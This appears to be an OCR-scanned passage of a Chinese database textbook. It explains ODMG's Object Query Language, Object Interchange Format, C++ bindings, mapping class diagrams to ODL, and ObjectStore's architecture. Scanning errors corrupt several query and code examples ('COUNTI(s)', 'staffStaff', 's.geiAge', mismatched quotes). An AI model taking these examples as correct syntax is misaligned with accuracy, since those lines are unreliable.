该 表达 式 返回 所 有 在 managers 范围 内 的 工资 高 于 12 000 英镑 的 对 象 。 表 达 式 : 


EXISTS x IN managers.manages: x.address.city =“London ”; 


如 果 至 少 有 一 个 分 公司 在 伦敦 (London)， 则 返回 ture ( managers.manages 返回 一 个 Branch 
对 象 ， 然 后 就 可 以 检查 这 个 对 象 的 属性 city 是 否 包含 London 这 个 值 )。 

SELECT 子 句 的 格式 类 似 于 标准 的 SQL SELECT 语句 (参见 6.3.1 节 ); 

SELECT [DISTINCT] <expression> 


FROM <fromList> 

[WHERE <expression>] 

[GROUP BY <attributel:expressionl, attribute2:expression2,...>] 
[HAVING <predicate>] 

[ORDER BY <expression>] 

其 中 : 

<fromList> ::= <variableName> IN <expression> | 


<variableName> IN <expression>, <fromList> | 
<expression> AS <variableName> | 
<expression> AS <variableName>, <fromList> 


若 查 询 中 使 用 了 SELECT DISTINCT， 则 查询 的 结果 为 一 个 Set， 若 使 用 了 ORDER BY 
则 为 一 个 List， 否 则 的 话 就 为 一 个 Bag。ORDER BY、GROUP BY 和 HAVING 子 句 的 含义 
与 一 般 的 SQL 语句 相同 (参见 6.3.2 节 和 6.3.4 节 )。 然 而 ,在 OQL 中 ，GROUP BY 子 句 的 
功能 已 经 扩展 为 可 以 显 式 地 引用 每 一 个 分 组 (在 OQL 中 称 为 划分 ( partition)) 中 的 对 象 集 ， 
我 们 将 在 例 28.6 中 阐明 。 
转换 表达 式 
。 如 果 e 是 一 个 表达 式 ， 则 element(e) 是 一 个 检查 e 是 否 是 单个 成 分 的 表达 式 ， 若 不 
是 则 产生 一 个 异常 。 
e 如 果 e 是 一 个 表 表 达 式 ， 则 listtoset(e) 是 一 个 将 该 表 转 换 成 一 个 集合 的 表达 式 。 
e 如 果 e 是 一 个 具有 集合 值 的 表达 式 ， 则 flatten(e) 是 一 个 将 集合 构成 的 集 转换 成 一 个 
集 的 表达 式 ， 也 就 是 将 该 结构 平板 化 。 
e 如 果 e 是 一 个 表达 式 ，c 是 一 个 类 型 名 ， 则 c(e) 是 一 个 判断 e 是 否 为 类 型 c 的 对 象 的 
表达 式 ， 若 不 是 则 引发 一 个 异常 。 
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带 下 标的 集 表 达 式 ”如果 ei、e: 是 表 或 者 数组 ，es、e4 为 整数 ， 则 ei[e3]、ei[e3: e4]、 
first (el )、last (el ) 及 (ei 十 e ) 都 是 表达 式 。 例 如 : 


first (element (SELECT b FROM b IN branchOffices 
WHERE b.branchNo = “B001").Has); 


上 述 表 达 式 将 返回 属于 分 公司 B001 的 销售 人 员 集 合 的 第 一 个 成 员 。 

二 元 集合 表达 式 ”如 果 el、e: 是 集合 或 包 ， 则 ei、e; 的 集合 操作 并 、 差 和 交 都 是 表达 式 。 
查询 

一 个 查询 的 组 成 为 一 组 (可 能 为 空 ) 查询 定义 表达 式 ， 后 跟 一 个 表达 式 。 查 询 的 结果 为 
一 个 带 或 不 带 标识 符 的 对 象 。 


| 例 28.2 3》 对 象 查询 语言 一 一 范围 和 遍历 路 径 的 用 法 

(1) 获取 全 部 职员 的 集合 ( 带 标 识 符 )。 

通常 ， 每 个 查询 都 需要 一 个 数据 库 的 入 口 点 ， 入 口 点 可 以 是 任何 具名 的 持久 对 象 ( 即 一 
个 范围 或 者 一 个 具名 对 象 )。 在 这 种 情况 下 ,我 们 可 以 利用 类 Sta 任 的 范围 生成 所 需 的 集合 ， 
该 查询 的 表达 式 非常 简单 ， 如 下 所 示 : 

staff 

(2 ) 获取 所 有 分 公司 经 理 的 集合 ( 带 标 识 符 )。 

branchOffices.ManagedBy 

在 这 种 情况 下 ， 可 以 用 类 Branch 的 范围 的 名 字 ( branchOffices) 作为 数据 库 的 入 口 点 ， 
进而 根据 联系 ManagedBy 找到 分 公司 的 经 理 。 

(3 ) 找到 位 于 伦敦 的 所 有 分 公司 。 

SELECT b.branchNo 

FROM b IN branchoOffices 

WHERE b.address.city = "London”; 

同样 ， 我 们 可 以 用 范围 BranchOffices 作为 数据 库 的 入 口 点 ， 然 后 利用 迭代 变量 bb 遍历 
该 集合 中 的 对 象 (类似 于 关系 演算 中 用 元 组 变量 遍历 元 组 )。 查 询 结 果 的 类 型 为 bag<string>， 
因为 选择 列表 只 包含 属性 branchNo， 而 它 是 string 类 型 的 。 

(4) 假设 londonBranches 是 一 个 具名 对 象 (对 应 于 上 一 个 查询 的 对 象 )。 用 这 个 具名 对 
象 查找 所 有 在 这 个 分 公司 工作 的 职员 。 

可 以 将 这 个 查询 表示 成 : 

londonBranches.Has 

上 述 查 询 将 返回 set<SalesStaff> 类 型 。 要 想 查询 销售 人 员 的 工资 ,直觉 上 我 们 认为 可 以 
这 样 表示 : 

londonBranches.Has.salary 

但 是 ， 在 OQL 中 这 是 不 允许 的 ， 因 为 返回 类 型 不 明确 : 可 能 为 set<float>， 也 可 能 为 
bag<float> (bag 的 可 能 性 比较 大 ， 因 为 可 能 多 名 职员 都 具有 相同 的 工资 )。 因 此 应 该 这 样 
表示 : 


SELECT [ DISTINCT ] s.salary 
FROM s IN londonBranches.Has; 


标明 DISTINCT 以 后 将 返回 set<float> 类 型 ， 如 果 没 有 DISTINCT 则 返回 bag<float> 
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| 例 28.3 3 对象 查询 语言 一 一 DEFINE 的 用 法 

查找 所 有 在 伦敦 工作 的 职员 (不 带 标 识 符 )。 

- 该 查询 可 以 表示 为 : 

DEFINE Londoners AS 

SELECT s 
FROM s IN salesStaff 
WHERE s.WorksAtaddress.city = “London”; 

SELECT s.name.IName FROM s IN Londoners; 

该 查询 将 返回 一 个 set<string> 类 型 的 文字 。 在 该 例 中 ， 使 用 DEFINE 语句 创建 了 一 个 
OQL 视图 ， 然 后 再 对 这 个 视图 进行 查询 ， 以 获得 想 要 的 结果 。 在 OQL 中 ， 与 模式 中 所 有 的 
具名 对 象 、 类 、 方 法 或 者 函数 的 名 字 相 比 ， 视 图 的 名 字 应 该 共有 唯一 性 。 如 果 在 DEFINE 语 
名 中 指定 的 名 字 与 一 个 已 经 存在 的 模式 对 象 同名 ， 则 新 定义 的 这 个 名 字 将 会 取代 先前 定义 的 
那个 。OQL 还 允许 视图 带 有 参数 ， 因 此 可 以 将 上 述 视图 泛 化 为 : 


DEFINE CityWorker(cityname) AS 
SELECT s 
FROM s IN salesStaff 
WHERE s.WorksAtaddress.city = cityname; 


现在 就 可 以 用 上 述 查 询 查 找 在 伦敦 和 格拉 斯 哥 工 作 的 职员 ， 如 下 所 示 : 

CityWorker(" London ); 

CityWorker( Glasgow ”); < 
| 例 28.4 从 对 象 查询 语言 一 一 结构 的 用 法 

(1) 找 出 所 有 在 伦敦 工作 的 销售 人 员 ， 结 果 为 包括 其 名 字 、 性 别 和 年 龄 的 结构 化 的 集合 
(不 带 标识 符 )。 

该 查询 可 以 表示 为 : 

SELECT struct (IName: s.name.IName, sex: s.sex, age: s.geiAge) 


FROM s IN salesStaff 
WHERE s.WorksAt.address.city = “London”; 


上 述 查 询 将 返回 一 个 set<struct> 类 型 的 文字 。 注 意 该 例 中 方法 getAge 在 SELECT 子 名 
中 的 使 用 。 

(2) 查找 所 有 超过 60 岁 的 副 经 理 ， 结 果 为 包括 其 名 字 、 性 别 和 年 龄 的 结构 化 的 集合 
( 带 标识 符 )。 

该 查询 可 以 表示 为 : 

class Deputy {attribute string IName; attribute sexType sex; 

attribute integer age;} ; 
typedef bag<Deputy> Deputies; 
Deputies (SELECT Deputy (IName: s.name.IName, sex: s.Sex, age: s.getAge) 


FROM s IN staffStaff WHERE position = “Deputy” AND 
s.getAge > 60); 


该 查询 将 返回 一 个 类 型 为 Deputies 的 可 变 对 象 。 

(3) 获取 所 有 位 于 伦敦 的 分 公司 信息 ， 结 果 为 包括 了 分 公司 编号 和 该 分 公司 所 有 助理 的 
结构 化 的 集合 (不 带 标识 符 )。 

该 查询 将 返回 一 个 set<struct> 类 型 的 文字 : 
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SELECT struct (branchNo: x.branchNo, assistants: (SELECT y FROM y 
IN x.WorksAt WHERE y.position = “Assistant”)) 
FROM x IN (SELECT b FROM b IN branchOffices 
WHERE b.address.city = “London”); «< 


| 例 28.5 》》 对 象 查 询 语言 一 一 聚集 的 用 法 

。 有 多 少 名 职员 在 格拉 斯 哥 工作 ? 

在 这 种 情况 下 ， 可 以 使 用 聚集 操作 COUNT 和 前 面 定义 的 视图 CityWorker 将 该 查询 表 
示 为 : 

COUNT (s IN CityWorker( Glasgow”)); 

OQL 的 聚集 函数 既 可 以 用 在 选择 子 句 里 ， 也 可 以 应 用 到 选择 操作 的 结果 上 。 例 如 ， 下 
面 的 两 个 表达 式 在 OQL 中 是 等 价 的 : 


SELECT COUNTI(s) FROM s IN salesStaff WHERE s.WorksAt.branchNo = “B003"; 
COUNT(SELECTs FROM s IN salesStaff WHERE s.WorksAt.branchNo = “BO03”); 


注意 OQL 允许 聚集 操作 用 于 任何 适当 类 型 的 集合 上 ， 这 一 点 与 SQL 不 同 ， 并 且 可 以 用 
于 查询 的 任何 部 位 。 例 如 ， 下 面 的 表达 式 在 OQL 中 是 允许 的 (但 是 在 SQL 中 是 不 允许 的 ): 


SELECT s 
FROM s IN salesStaff 
WHERE COUNT (s.WorksAt) > 10; 《人 


| 例 28.6 罗 GROUP BY 和 HAVING 子 铝 
e 确定 每 个 分 公司 中 销售 职员 的 人 数 。 
SELECT struct(branchNumber, numberOfStaff: COUNT!(partition)) 


FROM s IN salesStaff 
GROUP BY branchNumber: s.WorksAt.branchNo; 





分 组 操作 结果 的 类 型 是 set<struct(branchNumber:string, partition:bag<struct(s:SalesStaff)>)>， 其 
中 ， 每 一 个 划分 (组) 都 是 包含 了 两 个 组 成 部 分 的 一 种 结构 : 分 组 属性 值 branchNumber 和 
属于 该 划分 的 销售 人 员 对 象 构成 的 一 个 包 。SELECT 子 名 返回 分 组 属性 branchNumber， 和 
每 一 个 划分 中 包含 的 元 素 的 总 数 ( 本 例 为 每 个 分 公司 中 销售 人 员 的 个 数 )。 注 意 ， 关 键 字 
partition 意 指 每 个 划分 。 最 终 的 查询 结果 的 类 型 为 : 

set<struct(branchNumber: string, numberOfStaff: integer)> 

与 SQL 中 一 样 ， 可 以 用 HAVING 子 句 对 划分 进行 过 滤 。 例 如 ， 为 了 确定 那些 拥有 10 
以 上 销售 人 员 的 分 公司 的 销售 人 员 的 平均 工资 ， 可 以 这 样 表示 : 

SELECT branchNumber, averageSalary: AVG (SELECT p.s.salary FROM p IN 

Partition) 
FROM s IN salesStaff 


GROUP BY branchNumber: s.WorksAt.branchNo 
HAVING COUNT (partition) > 10; 


注意 在 聚集 操作 AVG 中 的 SELECT 语句 。 在 该 语句 中 ， 和 迭代 变量 p 将 遍历 划分 集 (具有 类 
型 bag<struct(s: SalesStaff)>)。 路 径 表 达 式 p.s.salary 用 于 访问 划分 中 每 个 销售 人 员 的 工资 。 《《 
28.2.5 ODMG 标准 的 其 他 部 分 


在 本 节 中 ， 将 简单 介绍 ODMG 3.0 标准 的 另外 两 个 部 分 : 
e 对 象 交换 格式 
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。 ODMG 语言 绑 定 
对 象 交换 格式 

对 象 交换 格式 (Object Interchange Format，OIF ) 是 一 种 说 明 语 言 ， 用 于 从 一 个 或 多 个 
文件 装载 ODMG 的 当前 状态 ,或 者 将 ODMG 的 当前 状态 导出 到 文件 中 。OIF 可 以 用 于 在 
ODMS 之 间 交 换 持 久 对 象 、 传 播 数 据 、 提 供 文档 以 及 驱动 测试 套件 ( Cattell，2000 )。OIF 
被 设计 成 为 能 够 支持 与 ODMG 对 象 模型 和 ODL 模式 定义 兼容 的 所 有 可 能 的 ODMS 状态 。 
其 设计 还 尽 可 能 地 遵照 了 NCITS (National Committee for Information Technology Standards,，, 
美国 国家 信息 技术 标准 委员 会 ) 的 标准 和 机 械 CAD 领域 的 PDES/STEP 标准 (PDES : 
Product Data Exchange using STEP， 应 用 STEP 标准 的 产品 数据 交换 标准 ; STEP : STandard 
for the Exchange of Product model data， 产 品 型 号 数据 交换 标准 )。 

一 个 OIF 文件 是 由 一 个 或 多 个 对 象 定义 组 成 的 ， 一 个 对 象 定义 就 是 一 个 对 象 标 识 符 ( 带 
有 可 选 的 物理 簇 集 指示 器 ) 和 一 个 类 名 ( 带 有 可 选 的 初始 化 信息 )。 下 面 给 出 一 些 对 象 定义 
的 例子 : 


John {SalesStaff} 创建 了 SalesStaff 类 的 一 个 实例 ， 名 为 John 


创建 了 SalesStaff 类 的 一 个 名 为 John 的 实例 ， 该 实例 在 物理 上 靠近 持久 对 
象 Mary。 在 此 上 下 文中 ,“ 物 理 上 靠近 ”与 具体 实现 相关 


在 SalesStaff 类 的 实例 John 与 名 为 B001 的 对 象 之 间 创 建 了 一 个 称 为 
WorksAt 的 联系 


John (Mary) {SalesStaff} 


John SalesStaff{WorksAt B001} 





对 OIF 说 明 语 言 的 完整 描述 超出 了 本 书 的 范围 有 兴趣 的 读者 可 以 参阅 Cattell( 2000 )。 
ODMG 语言 绑 定 

语言 绑 定 说 明了 ODL/OML 的 结构 如 何 映射 到 编程 语言 的 结构 中 去 。ODMG 支持 的 语 
言 有 C++、Java 和 Smalltalk。 语 言 绑 定 的 基本 设计 规则 是 : 让 程序 员 认 为 正在 使 用 的 只 有 
一 种 语言 ， 而 不 是 两 种 不 同 的 语言 。 本 节 将 简单 介绍 C++ 绑 定 的 工作 原理 。 

需要 提供 一 个 C++ 类 库 ， 该 类 库 包含 有 实现 了 ODL 结构 的 类 和 函数 。 另 外 ，OML 
(Object Manipulation Language， 对 象 操作 语言 ) 用 于 说 明 在 应 用 程序 中 如 何 检索 和 操作 数据 
库 对 象 。 为 了 创建 一 个 可 执行 的 应 用 程序 ，C++ 的 ODL 声明 先 传 给 C++ ODL 预 处 理 器 处 
理 ， 它 将 产生 一 个 包含 了 对 象 数 据 库 定 义 的 C++ 头 文件 ， 并 将 ODMS 元 数据 存储 在 数据 库 
中 。 然 后 ， 含 有 OML 的 C++ 应 用 程序 和 已 生成 的 对 象 数据 库 定义 的 C++ 头 文件 一 道 进行 
常规 编译 。 最 后 ， 将 编译 器 输出 的 对 象 代码 与 ODMS 运行 库 进行 链接 ， 生 成 所 需 的 可 执行 
映像 ， 如 图 28-18 所 示 。 除 了 ODL/OML 绑 定之 外 , 在 ODL 和 OML 中 ， 程 序 员 也 可 以 使 
用 一 组 被 称 为 物理 编译 指示 ( physical pragmas) 的 结构 ， 控 制 某 些 物理 存储 特性 ， 例 如 将 磁 
盘 上 的 对 象 簇 集 存储 以 及 对 索引 和 内 存 的 管理 。 

在 C++ 的 类 库 中 ， 凡 是 与 ODMG 对 象 模型 的 接口 实现 相关 的 要 素 均 以 d_ 为 前 级 。 例 
如 表示 基本 数据 类 型 的 d Float、d_String、d_Short， 表 示 集 类 型 的 d List、d_Set、d_Bag。 
还 有 与 Iterator 类 对 应 的 d_Iterator 以 及 与 extent 类 对 应 的 d_Extent。 另 外 ， 还 为 数据 库 模 式 
中 的 每 一 个 类 了 定义 了 一 个 模板 类 d_Ref(T)， 它 既 可 以 引用 类 T 的 持久 对 象 ， 也 可 以 引用 
类 工 的 临时 对 象 。 
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图 28-18 ”编译 和 链接 一 个 C++ ODL/OML 应 用 程序 


联系 则 是 通过 一 个 引用 (针对 1 : 1 联系) 或 者 是 通过 一 个 集 (针对 1 : * 联系 ) 来 处 
理 的 。 例 如 ， 为 了 在 Branch 类 中 表示 1 : * 联系 Has， 可 以 这 样 处 理 : 

d_Rel_Set<SalesStaff,_WorksAt> Has; 

const char _WorksAt[ ] = “WorksAt”; 


为 了 在 SalesStaff 类 中 表示 同一 个 联系 ， 我们 可 以 这 样 处 理 : 
d_Rel_Ref<Branch,_Has> WorksAt; 
const char _Has[ ] = “Has”; 


对 象 操作 语言 对 于 OML， 运 算 符 new 被 重 载 使 其 可 以 创建 持久 或 临时 对 象 。 为 了 创 
建 持久 对 象 ， 必 须 给 出 一 个 数据 库 名 和 一 个 对 象 名 。 例 如 ， 可 以 这 样 表示 临时 对 象 的 创建 : 

d_Ref<SalesStaff> tempSalesStaff = new SalesStaff; 

创建 一 个 持久 对 象 可 以 表示 为 : 

d_Database *myDB; 

d_Ref<SalesStaff> sl = new(myDB, “John White”) SalesStaff; 

对 象 查询 语言 在 C++ ODL/OML 程序 中 OQL 查询 的 执行 方式 有 : 

e 使 用 d_Collection 类 的 成 员 函 数 query 

e 使 用 d_OQL Query 接口 


现 给 出 第 一 种 方法 的 示例 ， 为 了 查找 由 工资 超过 30 000 英镑 的 销售 人 员 (wellPaidStaff) 
组 成 的 集合 ， 其 查询 语句 可 以 表示 为 : 
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d_Bag<d_ Ref<SalesStaff> > wellPaidStaff; 
SalesStaff-> query(wellPaidStaff, “salary > 30000”); 
再 给 出 第 二 种 方法 的 示例 ， 查 找 销售 人 员 的 工资 超过 某 一 阀 值 的 分 公司 的 语句 为 : 
dd_OQL Query q(“SELECT s.WorksAt FROM s IN SalesStaff WHERE salary > $1”); 
这 是 一 个 参数 化 的 查询 示例 ，$1 表示 运行 时 参数 。 为 了 给 该 参数 赋值 并 执行 查询 ， 可 
以 这 样 写 : 
d_ Bag<d_Ref<Branch> > branches; 


q << 30000; 
d_oql_execute(q, branches); 


关于 ODMG 语言 绑 定 的 详细 信息 ， 感 兴趣 的 读者 可 以 参阅 Cattell ( 2000 )。 


28.2.6 ”将 概念 设计 映射 为 逻辑 (面向 对 象 的 ) 设计 

在 27.8.2 节 我 们 简单 地 讨论 了 如 何在 数据 库 设计 方法 学 中 应 用 各 种 不 同 的 UML 图 。 本 
节 将 讨论 如 何 将 概念 模式 映射 为 ODL。 假 设 已 经 生成 了 概念 数据 库 设 计 部 分 的 一 个 类 图 ， 
类 图 由 类 (实体 类 型 )、 子 类 、 属 性 、 方 法 和 一 组 联系 构成 。 
步骤 1 映射 类 

将 每 一 个 类 或 者 子 类 ， 包括 所 有 相应 的 属性 和 方法 ， 映 射 为 一 个 ODL 类 。 将 组 合 属性 
映射 为 一 个 用 struct 声明 的 元 组 构造 器 。 对 多 值 属性 的 映射 如 下 所 示 : 

e 若 值 有 序 ， 则 映射 为 一 个 列表 (list) 构造 器 。 

e 若 值 有 重复 ， 则 映射 为 一 个 包 (bag) 构造 器 。 

e 否则， 了 映射 为 一 个 集合 (set) 构造 器 。 

为 每 一 个 类 创建 一 个 可 以 被 遍历 的 范围 (extent)。 为 每 一 个 ODL 类 指明 EXTENDS， 
表示 该 ODL 类 继承 了 某 个 超 类 的 属性 和 方法 而 成 为 该 超 类 的 子 类 。 
步骤 2 映射 二 元 联系 

对 于 每 一 个 二 元 联系 ， 在 每 一 个 参与 该 联系 的 类 中 都 增加 一 个 联系 特性 (或 引用 属性 )。 
如 果 ODMS 支持 的 话 ， 尽 可 能 地 使 用 逆向 联系 ， 以 保证 系统 能 够 自动 地 维护 引用 完整 性 。 
如 果 系 统 不 支持 ， 则 有 必要 在 类 的 方法 中 编写 能 够 实现 这 一 功能 的 代码 。 

如 果 多 重 性 为 1:1， 则 每 一 个 联系 的 特性 都 是 单 值 的 ; 如 果 多 重 性 为 1:*， 则 联系 的 特性 
将 一 边 是 单 值 的 ， 另 一 边 则 为 集 类 型 (根据 联系 的 具体 需求 可 能 为 list 或 者 set); 如 果 为 *:*， 
则 联系 的 双方 都 是 集 类 型 (参见 27.7.2 节 )。 

为 每 一 个 联系 的 属性 创建 一 个 形 如 < 联系 引用 ， 联 系 属性 > 的 元 组 构造 器 ( struct)。 用 
这 个 构造 器 替换 联系 的 特性 。 但 是 ， 这 将 阻止 逆向 联系 的 应 用 。 另 外 ， 如 果 创 建 双向 联系 ， 
则 存在 元 余 。 
步骤 3 映射 n 元 联系 

对 于 每 一 个 度 大 于 2 (例如 ， 三 元 、 四 元 ) 的 联系 ,创建 一 个 单独 的 类 表示 这 个 联系 ， 
并 在 每 一 个 参与 类 中 都 增加 一 个 联系 的 特性 (基于 1:* 联系 )。 
步骤 4 映射 类 别 

为 类 图 中 每 一 种 类 别 (category) (联合 类 型 ) 创建 一 个 表示 该 类 别 的 类 ， 并 且 在 类 别 类 与 它 
的 每 一 个 超 类 之 间 定 义 一 个 1:1 联系 。 若 ODMS 支持 的 话 ， 也 可 以 使 用 联合 类 型 (union type )。 
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28.3 ObjectStore 
本 节 将 讨论 一 个 商品 化 OODBMS 一 一 ObjectStore 的 架构 和 功能 。 


28.3.1 ”总体 结构 


ObjectStore 是 基于 多 客户 / 多 服务 器 架构 的 ， 每 一 个 服务 器 负责 控制 对 一 个 对 象 存储 的 
访问 ， 还 负责 管理 并 发 控制 (基于 锁 )、 数 据 恢复 、 事 务 日 志 等 其 他 任务 。 客 户 可 以 访问 本 
机 或 网 络 中 任何 其 他 主机 上 的 ObjectStore 服务 器 。 在 每 个 运行 了 一 个 或 多 个 客户 应 用 程序 
的 主机 上 ， 都 有 一 个 相应 的 高 速 缓存 管理 器 ( cache manager) 进程 ， 该 进程 的 主要 功能 是 通 
过 处 理 从 服务 器 到 客户 应 用 程序 的 回调 (callback) 消息 以 实现 对 数据 的 并 发 访问 。 此 外 ,每 
个 客户 应 用 程序 都 有 自己 的 客户 端 高 速 缓存 (client cache)， 该 缓存 作为 映射 (或 等 待 映射 ) 
到 物理 存储 器 的 数据 的 暂 存 区 域 。 典 型 的 结构 如 图 28-19 所 示 。 下 面 简要 介绍 这 些 进程 的 主 
要 任务 。 





图 28-19 ”ObjectStore 的 总 体 结构 


ObjectStore 服务 器 
ObjectStore 服务 器 是 负责 控制 对 主机 上 的 ObjectStore 数据 库 进 行 访问 的 进程 ， 主 要 任 
务 如 下 : 
e 存储 和 检索 持久 数据 。 
e 处 理 多 个 客户 应 用 程序 的 并 发 访问 。 
e 数据 库 恢复 。 
客户 应 用 程序 
ObjectStore 的 客户 库 被 链 人 每 一 个 客户 应 用 程序 中 ， 从 而 允许 客户 应 用 程序 : 
e 将 持久 对 象 映射 到 虚拟 地 址 。 
e 为 持久 对 象 分 配 和 回收 存储 空间 。 
e 维护 最 近 使 用 页 面 的 高 速 缓存 以 及 这 些 页 面 的 锁 状 态 。 
e 处 理 涉及 持久 对 象 的 页 面 地 址 故障 。 
高 速 缓存 管理 器 
高 速 缓存 管理 器 是 一 种 UNIX 的 守护 进程 或 Windows 服务 ， 它 与 客户 应 用 程序 运行 于 
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同一 台 机 器 上 。 其 功能 是 作为 客户 应 用 程序 的 替身 对 服务 器 的 请 求 做 出 响应 ， 并 且 还 负责 管 
理应 用 程序 的 客户 端 高 速 缓存 ， 而 后 者 的 存在 是 为 了 加 快 对 持久 对 象 的 访问 。 客 户 端 高 速 组 
存 是 为 那些 映射 到 或 者 等 待 映射 到 虚 存 的 数据 而 开辟 的 本 地 缓冲 区 。 当 客户 应 用 程序 需要 访 
问 持久 对 象 时 ， 下 列 情 形 将 产生 一 个 页 面 失效 : 

e 对 象 不 在 物理 内 存 中 ， 也 不 在 客户 端 高 速 缓存 内 。 

e 对 象 在 客户 端 高 速 缓存 内 ， 但 是 还 没有 被 访问 过 。 

e 对 象 在 客户 端 高 速 缓存 内 ,但 之 前 是 被 使 用 不 同 的 读 / 写 许可 访问 的 。 

在 这 些 情 况 下 ，ObjectStore 客户 将 从 服务 器 请 求 页 面 ， 将 其 复制 到 客户 端 高 速 缓存 中 ， 
然后 继续 执行 。 如 果 不 属于 上 述 情况 中 的 任何 一 种 ， 则 高 速 缓存 内 的 对 象 是 可 访问 的 ， 应 用 
程序 可 以 直接 访问 。 

所 有 权 、 加 锁 和 高 速 缓存 管理 器 

为 了 理解 高 速 缓存 管理 器 的 功能 ， 首 先 必须 理解 ObjectStore 的 所 有 权 和 加 锁 机 制 。 客 
户 可 以 从 服务 器 申请 到 对 某 一 页 面 的 读 、 写 许可 。 只 要 没有 客户 拥有 写 所 有 权 ， 则 读 所 有 权 
可 以 被 授予 给 所 有 提出 该 请 求 的 客户 ,但 是 在 任何 一 个 时 刻 ， 只 有 一 个 客户 可 以 拥有 写 所 有 
权 。 当 客户 在 事务 的 进行 过 程 中 需要 读 或 写 某 个 页 面 时 ， 就 要 在 那个 页 面 上 放置 一 个 读 锁 或 
者 写 锁 ， 从 而 防止 其 他 客户 得 到 该 页 面 的 写 许可 。 客 户 必须 先 具有 读 或 写 所 有 权 ， 然 后 才能 
在 页 面 上 加 读 锁 或 者 写 锁 。 一 旦 事务 完成 ,客户 将 该 锁 释放 (尽管 它 可 以 继续 持 有 所 有 权 )。 

注意 所 有 权 和 锁 之 间 的 区 别 : 所 有 权 给 了 客户 读 取 或 者 更 新 页 面 的 许可 ， 而 锁 允 许 客户 
实际 地 读 取 或 者 更 新 页 面 。 有 了 页 面 所 有 权 后 ， 客 户 就 可 以 在 不 与 服务 器 通信 的 情况 下 锁 住 
一 个 页 面 。 

当 客户 请 求 读 取 某 一 页 面 的 许可 并 且 没 有 其 他 的 客户 拥有 更 新 该 页 面 的 许可 时 ， 服 务 器 
才能 够 授予 其 读 所 有 权 ， 高 速 缓存 管理 器 并 不 参与 其 中 。 然 而 ， 当 出 现下 列 情形 时 ， 就 会 涉 
及 高 速 缓存 管理 器 的 操作 : 

e 一 个 客户 请 求 某 一 页 面 的 读 或 写 许 可 ， 而 另外 一 个 客户 已 经 拥有 该 页 面 的 写 许 可 。 

e 一 个 客户 请 求 某 一 页 面 的 写 许 可 ， 而 至 少 有 一 个 其 他 的 客户 拥有 该 页 面 的 读 许 可 。 

在 这 些 情况 下 ， 服 务 器 就 会 给 拥有 许可 的 客户 端 相 关 的 高 速 缓存 管理 器 发 送 一 个 回调 消 
息 。 这 样 就 使 得 客户 可 以 专注 于 应 用 程序 的 执行 ， 而 不 必 监 听 回 调 消息 。 取 而 代 之 的 是 ， 由 
高 速 缓存 管理 器 决定 是 释放 读 或 写 许 可 ， 还 是 让 发 出 请 求 的 客户 等 待 。 

虚 存 映射 结构 

ObjectStore 的 一 个 特色 就 是 它 处 理 持久 性 的 方法 。ObjectStore 将 C++ 对 象 以 其 原 有 的 
格式 存储 在 磁盘 数据 库 中 ， 所 有 的 指针 都 完整 无 缺 地 被 保留 下 来 〈 而 不 是 像 27.3.1 节 中 讨论 
的 那样 将 其 切换 为 OID )。 关 于 如 何 完成 这 个 过 程 的 详细 解释 超出 了 本 书 的 范围 ， 因 此 我 们 
仅 对 这 一 机 制 进行 概述 。 

ObjectStore 虚 存 映射 结构 的 基本 思想 与 操作 系统 中 的 虚 存 管理 的 基本 思想 相同 。 对 象 
的 引用 是 通过 虚 存 地 址 实现 的 。 如 果 某 对 象 是 被 间接 引用 的 ， 并 且 该 对 象 驻 留 的 页 已 经 位 于 
内 存 ， 则 间接 引用 这 一 对 象 不 会 增加 额外 的 负载 ， 间 接 引 用 的 速度 将 与 执行 任何 C 或 C++ 
程序 一 样 快 。 如 果 所 需 页 面 不 在 内 存 ， 则 产生 一 个 页 面 失效 ， 并 且 将 该 页 装 入 到 指向 它 的 指 
针 原 先 占 有 的 虚 存 地 址 。 利 用 这 种 方法 ， 其 他 被 传送 对 象 中 指向 这 一 对 象 的 指针 均 为 指向 该 
指针 原始 目标 的 有 效 的 虚 存 指针 。 
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ObjectStore 对 这 一 过 程 的 管理 是 通过 为 持久 对 象 预 留 一 定 范围 的 未 映射 虚 存 空间 实现 
的 ， 从 而 保证 这 个 范围 只 会 用 于 保存 数据 库 页 面 ， 而 不 会 挪 作 他 用 。 当 某 一 程序 访问 它 的 
第 一 个 对 象 时 ，ObjectStore 将 包含 有 该 对 象 的 页 面 传送 到 虚 存 。 当 程序 想 要 从 这 个 初始 对 
象 出 发 访问 男 一 个 对 象 时 ， 即 利用 第 二 个 对 象 的 指针 对 其 进行 访问 时 ，ObjectStore 将 会 确 
保 该 指针 指向 的 一 定 是 虚 存 中 未 被 映射 的 部 分 。 这 会 导致 在 操作 系统 中 产生 一 个 页 面 失效 ， 
ObjectStore 陷 人 并 使 用 该 失效 将 包含 了 第 二 个 对 象 的 数据 库 页 面 装 入 虚 存 。 

当 程 序 首次 试图 修改 一 个 页 面 时 ， 将 产生 另外 一 种 操作 系统 异常 〈 一 个 写 失效 )。 同 样 ， 
ObjectStore 将 陷 人 这 个 异常 ， 并 将 失效 页 面 传送 到 虚 存 ， 若 有 必要 ， 还 会 修改 该 页 面 的 读 / 
写 保 护 标 志 。 然 后 程序 继续 进行 更 新 。 当 程序 希望 存储 更 新 结果 时 ，ObjectStore 就 会 将 所 有 
被 标记 成 更 新 的 页 面 复 制 到 数据 库 中 ， 并 将 其 保护 标志 重 置 为 只 读 。 当 数据 库 被 关闭 以 后 ， 
ObjectStore 将 从 虚 存 中 解除 所 有 页 面 的 映射 ， 并 释放 为 数据 库 保 留 的 虚 存 的 范围 。 通 过 这 
种 方法 ， 从 程序 员 的 角度 来 看 ， 持 久 对 象 和 临时 对 象 没有 任何 区 别 。 


28.3.2 构建 ObjectStore 应 用 程序 


C++ ObjectStore 应 用 程序 的 构建 与 28.2.5 节 讲 述 的 ODMG 与 C++ 语言 的 绑 定 稍 有 不 
ObjectStore 应 用 程序 的 构建 需要 用 到 多 个 文件 : 
e 包含 了 主要 应 用 程序 代码 的 C++ 源 文件 
， 。 包含 了 持久 类 的 C++ 头 文件 

e 必要 的 ObjectStore 头 文件 (例如 ，ostore.hh ) 

e 一 个 为 模式 生成 器 定义 持久 类 的 模式 源 文件 

建立 一 个 ObjectStore 应 用 程序 需要 生成 必要 的 模式 信息 ， 即 关于 应 用 程序 存储 在 持久 
存储 器 里 的 或 者 从 持久 存储 器 中 读 出 的 类 的 信息 。 模 式 源 文件 是 一 个 C++ 文件 ， 该 文件 包 
含 了 一 个 持久 类 的 列表 以 及 任何 可 达 的 (如 果 一 个 类 是 基 类 或 者 是 某 一 持久 对 象 的 成 员 类 ， 
